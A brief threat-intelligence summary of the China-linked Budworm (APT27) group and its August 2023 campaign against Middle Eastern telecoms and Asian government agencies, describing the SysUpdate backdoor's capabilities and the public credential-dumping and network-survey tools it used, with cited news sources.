The Budworm organisation, also known as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, is an organisation that has been active since 2013 and mainly targets organisations in the government, technology and defence sectors. In many cases, there is also evidence that the organization has carried out cyber espionage attacks against these sectors.
The organisation is often linked to China, but the organisation is not officially connected to the People’s Republic of China. Here are some arguments that confirm the connection of the organization to the Chinese Government :
- Operating hours: the group’s activities are aligned with the working hours of the Chinese time zone.
- Targets: Budworm is known to target organizations worldwide, including US defense contractors, financial services firms and a national data center. These targets often align with China’s strategic interests.
- Tools and techniques: The group uses tools and techniques that are commonly associated with other cyber-espionage groups linked to China.
- Linguistic indicators: Some of the tools used by Budworm contain linguistic indicators of Chinese origin.
In the August 2023 attack, the organization attacked Middle Eastern telecommunications companies and Asian government agencies. The attack involved the installation of an enhanced version of the SysUpdate toolkit. SysUpdate is a feature-rich backdoor with several capabilities, including:
- List, start, stop, and delete services
- Take screenshots
- Browse and terminate processes
- Drive information retrieval
- File management (finds, deletes, renames, uploads, downloads files, and browses a directory)
- Command execution
In addition to SysUpdate, the attackers employed various legitimate and publicly accessible tools to survey the network and extract credentials. The tools utilized in this campaign by the attackers included:
- AdFind: A tool accessible to the public, employed for querying Active Directory. While it serves legitimate purposes, attackers often leverage it extensively to assist in mapping a network.
- Curl: A command-line tool, open-source in nature, designed for data transfer across diverse network protocols.
- SecretsDump: An available-to-the-public tool capable of employing various techniques to extract secrets from a remote machine without deploying any agent. These techniques encompass activities such as extracting SAM and LSA secrets from registries, dumping NTLM hashes, retrieving plaintext credentials, and obtaining Kerberos keys. It also facilitates the dumping of the NTDS.dit Active Directory database.
- PasswordDumper: A tool dedicated to the extraction of passwords.
The group’s operations might have been curtailed in the early stages, as indicated by Symantec, as their success was limited to the theft of credentials.
Sources:
https://thehackernews.com/2023/09/china-linked-budworm-targeting-middle.html
https://therecord.media/suspected-chinese-hackers-target-telecom-asia-government